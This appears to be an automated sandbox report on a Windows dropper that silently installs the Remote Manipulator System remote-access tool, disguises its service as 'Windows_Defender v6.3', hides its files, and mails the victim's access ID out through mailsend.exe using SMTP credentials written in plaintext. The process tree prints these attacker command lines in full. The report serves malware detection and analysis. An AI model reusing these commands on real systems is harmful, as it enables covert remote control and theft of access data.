Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
26-08-2024 11:30
Static task
static1
Behavioral task
behavioral1
Sample
c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe
Resource
win7-20240708-en
General
-
Target
c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe
-
Size
4.5MB
-
MD5
c2e68d0204a75aa1f1f0615ec8883a67
-
SHA1
847dc490286760dd92fa8b95946c283ff4b0032e
-
SHA256
a151e201eef789f2f07854f967286de25a1ceeef7657e0c5e6b655af12e23ca5
-
SHA512
3653a2eb66c8a96905d223a7ec7d7e997fb3bcfa2cd626a05e12ee2a23b7bfa1ef89dc9205934c38e47e58030d0318e063fe8ce806cb2397f7bec78428508b39
-
SSDEEP
98304:HKF7KQF1iEaGzM038RzYf0ML2x5tTDaLclizt5C1:HS7KQrLM/RzYI7Da4Im
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3952 attrib.exe 4860 attrib.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x00080000000233a1-25.dat acprotect behavioral2/files/0x000800000002339f-24.dat acprotect -
resource yara_rule behavioral2/files/0x000c0000000233a9-23.dat aspack_v212_v242 behavioral2/files/0x00080000000233a2-22.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 8 IoCs
pid Process 384 rutserv.exe 1520 rutserv.exe 4740 rutserv.exe 4416 rutserv.exe 4872 rfusclient.exe 5036 rfusclient.exe 2872 rfusclient.exe 3080 mailsend.exe -
resource yara_rule behavioral2/files/0x00080000000233a1-25.dat upx behavioral2/files/0x000800000002339f-24.dat upx -
Drops file in Program Files directory 35 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\System\regedit.reg attrib.exe File opened for modification C:\Program Files (x86)\System\id.txt attrib.exe File created C:\Program Files (x86)\System\install.vbs c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File created C:\Program Files (x86)\System\vp8encoder.dll c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File created C:\Program Files (x86)\System\rfusclient.exe c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\rfusclient.exe c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\rutserv.exe c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File created C:\Program Files (x86)\System\regedit.reg c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File created C:\Program Files (x86)\System\__tmp_rar_sfx_access_check_240616906 c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\install.vbs c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\vp8decoder.dll c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\regedit.reg c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\mailsend.exe c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Common Files\System attrib.exe File created C:\Program Files (x86)\System\rutserv.exe c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\install.bat attrib.exe File opened for modification C:\Program Files (x86)\System\id.txt reg.exe File opened for modification C:\Program Files (x86)\System\regedit.reg attrib.exe File opened for modification C:\Program Files (x86)\System c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File created C:\Program Files (x86)\System\mailsend.exe c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System attrib.exe File opened for modification C:\Program Files (x86)\System\mailsend.exe attrib.exe File created C:\Program Files (x86)\System\install.bat c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\rfusclient.exe attrib.exe File created C:\Program Files (x86)\System\id.txt reg.exe File opened for modification C:\Program Files (x86)\System\vp8encoder.dll c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\rutserv.exe attrib.exe File created C:\Program Files (x86)\System\vp8decoder.dll c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\install.bat c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\vp8encoder.dll attrib.exe File opened for modification C:\Program Files (x86)\System\mailsend.exe attrib.exe File opened for modification C:\Program Files (x86)\System\install.vbs attrib.exe File opened for modification C:\Program Files (x86)\System\install.vbs attrib.exe File opened for modification C:\Program Files (x86)\System\vp8decoder.dll attrib.exe File opened for modification C:\Program Files (x86)\System\install.bat attrib.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4908 sc.exe 1612 sc.exe 3216 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 31 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mailsend.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 2988 timeout.exe 1384 timeout.exe 3976 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 2652 taskkill.exe 432 taskkill.exe 4200 taskkill.exe 1996 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe -
Runs .reg file with regedit 1 IoCs
pid Process 4180 regedit.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 384 rutserv.exe 384 rutserv.exe 384 rutserv.exe 384 rutserv.exe 384 rutserv.exe 384 rutserv.exe 1520 rutserv.exe 1520 rutserv.exe 4740 rutserv.exe 4740 rutserv.exe 4416 rutserv.exe 4416 rutserv.exe 4416 rutserv.exe 4416 rutserv.exe 4416 rutserv.exe 4416 rutserv.exe 4872 rfusclient.exe 4872 rfusclient.exe 3080 mailsend.exe 3080 mailsend.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 2872 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 4200 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 2652 taskkill.exe Token: SeDebugPrivilege 432 taskkill.exe Token: SeDebugPrivilege 384 rutserv.exe Token: SeDebugPrivilege 4740 rutserv.exe Token: SeTakeOwnershipPrivilege 4416 rutserv.exe Token: SeTcbPrivilege 4416 rutserv.exe Token: SeTcbPrivilege 4416 rutserv.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 384 rutserv.exe 1520 rutserv.exe 4740 rutserv.exe 4416 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3672 wrote to memory of 5056 3672 c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe 87 PID 3672 wrote to memory of 5056 3672 c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe 87 PID 3672 wrote to memory of 5056 3672 c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe 87 PID 5056 wrote to memory of 2036 5056 WScript.exe 88 PID 5056 wrote to memory of 2036 5056 WScript.exe 88 PID 5056 wrote to memory of 2036 5056 WScript.exe 88 PID 2036 wrote to memory of 3952 2036 cmd.exe 90 PID 2036 wrote to memory of 3952 2036 cmd.exe 90 PID 2036 wrote to memory of 3952 2036 cmd.exe 90 PID 2036 wrote to memory of 4860 2036 cmd.exe 91 PID 2036 wrote to memory of 4860 2036 cmd.exe 91 PID 2036 wrote to memory of 4860 2036 cmd.exe 91 PID 2036 wrote to memory of 4200 2036 cmd.exe 92 PID 2036 wrote to memory of 4200 2036 cmd.exe 92 PID 2036 wrote to memory of 4200 2036 cmd.exe 92 PID 2036 wrote to memory of 1996 2036 cmd.exe 94 PID 2036 wrote to memory of 1996 2036 cmd.exe 94 PID 2036 wrote to memory of 1996 2036 cmd.exe 94 PID 2036 wrote to memory of 2652 2036 cmd.exe 95 PID 2036 wrote to memory of 2652 2036 cmd.exe 95 PID 2036 wrote to memory of 2652 2036 cmd.exe 95 PID 2036 wrote to memory of 432 2036 cmd.exe 96 PID 2036 wrote to memory of 432 2036 cmd.exe 96 PID 2036 wrote to memory of 432 2036 cmd.exe 96 PID 2036 wrote to memory of 4504 2036 cmd.exe 97 PID 2036 wrote to memory of 4504 2036 cmd.exe 97 PID 2036 wrote to memory of 4504 2036 cmd.exe 97 PID 2036 wrote to memory of 4180 2036 cmd.exe 98 PID 2036 wrote to memory of 4180 2036 cmd.exe 98 PID 2036 wrote to memory of 4180 2036 cmd.exe 98 PID 2036 wrote to memory of 1384 2036 cmd.exe 99 PID 2036 wrote to memory of 1384 2036 cmd.exe 99 PID 2036 wrote to memory of 1384 2036 cmd.exe 99 PID 2036 wrote to memory of 384 2036 cmd.exe 100 PID 2036 wrote to memory of 384 2036 cmd.exe 100 PID 2036 wrote to memory of 384 2036 cmd.exe 100 PID 2036 wrote to memory of 1520 2036 cmd.exe 101 PID 2036 wrote to memory of 1520 2036 cmd.exe 101 PID 2036 wrote to memory of 1520 2036 cmd.exe 101 PID 2036 wrote to memory of 4740 2036 cmd.exe 102 PID 2036 wrote to memory of 4740 2036 cmd.exe 102 PID 2036 wrote to memory of 4740 2036 cmd.exe 102 PID 4416 wrote to memory of 4872 4416 rutserv.exe 106 PID 4416 wrote to memory of 4872 4416 rutserv.exe 106 PID 4416 wrote to memory of 4872 4416 rutserv.exe 106 PID 4416 wrote to memory of 5036 4416 rutserv.exe 107 PID 4416 wrote to memory of 5036 4416 rutserv.exe 107 PID 4416 wrote to memory of 5036 4416 rutserv.exe 107 PID 2036 wrote to memory of 1612 2036 cmd.exe 108 PID 2036 wrote to memory of 1612 2036 cmd.exe 108 PID 2036 wrote to memory of 1612 2036 cmd.exe 108 PID 2036 wrote to memory of 3216 2036 cmd.exe 109 PID 2036 wrote to memory of 3216 2036 cmd.exe 109 PID 2036 wrote to memory of 3216 2036 cmd.exe 109 PID 2036 wrote to memory of 4908 2036 cmd.exe 111 PID 2036 wrote to memory of 4908 2036 cmd.exe 111 PID 2036 wrote to memory of 4908 2036 cmd.exe 111 PID 2036 wrote to memory of 3976 2036 cmd.exe 112 PID 2036 wrote to memory of 3976 2036 cmd.exe 112 PID 2036 wrote to memory of 3976 2036 cmd.exe 112 PID 4872 wrote to memory of 2872 4872 rfusclient.exe 114 PID 4872 wrote to memory of 2872 4872 rfusclient.exe 114 PID 4872 wrote to memory of 2872 4872 rfusclient.exe 114 PID 2036 wrote to memory of 3212 2036 cmd.exe 130 -
Views/modifies file attributes 1 TTPs 7 IoCs
pid Process 4940 attrib.exe 4876 attrib.exe 3320 attrib.exe 2652 attrib.exe 4444 attrib.exe 3952 attrib.exe 4860 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\c2e68d0204a75aa1f1f0615ec8883a67_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System" +H +S /S /D4⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3952
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\*.*" +H +S /S /D4⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4860
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rutserv.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
C:\Windows\SysWOW64\taskkill.exeTaskkill /f /im rutserv.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rfusclient.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\SysWOW64\taskkill.exeTaskkill /f /im rfusclient.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f4⤵
- System Location Discovery: System Language Discovery
PID:4504
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "regedit.reg"4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:4180
-
-
C:\Windows\SysWOW64\timeout.exetimeout 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1384
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /silentinstall4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:384
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /firewall4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1520
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /start4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4740
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10004⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1612
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3216
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Windows_Defender v6.3"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4908
-
-
C:\Windows\SysWOW64\timeout.exetimeout 1204⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3976
-
-
C:\Windows\SysWOW64\reg.exereg export "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4" "id.txt"4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3212
-
-
C:\Windows\SysWOW64\timeout.exetimeout 104⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2988
-
-
C:\Program Files (x86)\System\mailsend.exemailsend.exe -t [email protected] -attach id.txt,application/txt -sub "RMS" -smtp smtp.yandex.ru -port 465 -f [email protected] -name "RMS" -ssl -auth-login -user liurov02 -pass brawlstars33 -q4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3080
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\regedit.reg" -S -H /S /D4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4940
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\mailsend.exe" -S -H /S /D4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4876
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\id.txt" -S -H /S /D4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3320
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\install.vbs" -S -H /S /D4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2652
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\install.bat" -S -H /S /D4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4444
-
-
-
-
C:\Program Files (x86)\System\rutserv.exe"C:\Program Files (x86)\System\rutserv.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe" /tray3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:2872
-
-
-
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe" /tray2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5036
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c6e01f51df0c9ac47265b9c29b6ee7a7
SHA13bc0f86e02bfe9c9090227681241cb2b49858831
SHA256a610273887ddabe5cf0c560672d4669d5022c74ded2e89aa97a988c11311acdb
SHA5129ebb76017395032a95b59eaab1e2ac320601fddb4fc521409646cd6b86a456837ad0900595e065b39a51f429848574e5021409dbc42edd114260273cb44ff4c5
-
Filesize
120B
MD5c719a030434d3fa96d62868f27e904a6
SHA1f2f750a752dd1fda8915a47b082af7cf2d3e3655
SHA2562696ee4302a85c6b4101fc6d1ce8e38b94fd9c2bbd1acc73b553576b3aacb92f
SHA51247a9367f7596d19c0636766cd34ca3701d3b1239a284f2333fd04a48422f53b0df21002fd38a4f229f6a2f9f9e8163267e13ecb24d9ce6de1863d5f59ab04ff0
-
Filesize
1.2MB
MD5ac23b87f8ec60ddd3f555556f89a6af8
SHA13cea6f84757d15ee8d7fa19d3dfc4992c50aa90c
SHA25680a1d0a15066c7af67cf5377e59e450c2a96018505236f8f3352173282b27ae4
SHA51257e67eab9c2a3b94161500eb0091533a539454e9bfddd47c61477299de9455b7ca11c498c5d8a7d77f4763a2053acb4ff96868a9313fede29969edc16d35b167
-
Filesize
12KB
MD5251212852a073e6fc5fbe3af92f66adb
SHA16ee07cb20f57830325c11867e68fea49ae0e87ea
SHA256f2c83f4cc13b0cd28090dd128ec5ff221681118f6100eddaead88526070ceecb
SHA512f3853ece99edc6d39edbf1c7bca471e71aa034684a85358b033e50418ffa061f1e8724cba76065048901c20c9f9a6dbd86a17ee33756c0452d4d3358047296be
-
Filesize
1.5MB
MD5b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
Filesize
1.7MB
MD537a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
Filesize
155KB
MD588318158527985702f61d169434a4940
SHA13cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA2564c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA5125d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff
-
Filesize
593KB
MD56298c0af3d1d563834a218a9cc9f54bd
SHA10185cd591e454ed072e5a5077b25c612f6849dc9
SHA25681af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe
-
Filesize
20KB
MD5ad06ea5dab2002ee92e222fce2861869
SHA1147420fd97f35523b9072fd71b86a9b33d8e46fb
SHA25657c08d7887c93fad9f3ebccd07808f984dd5b291ad42acc3263e17fe43283bd4
SHA51293fb723715436e178fca2db1b73c02ffb447a7007f87b948dd287d6ec72d3a89a82f7a7393b30acbbb082d5242866840e83c5a5bc6066ec3665fa544685f36f2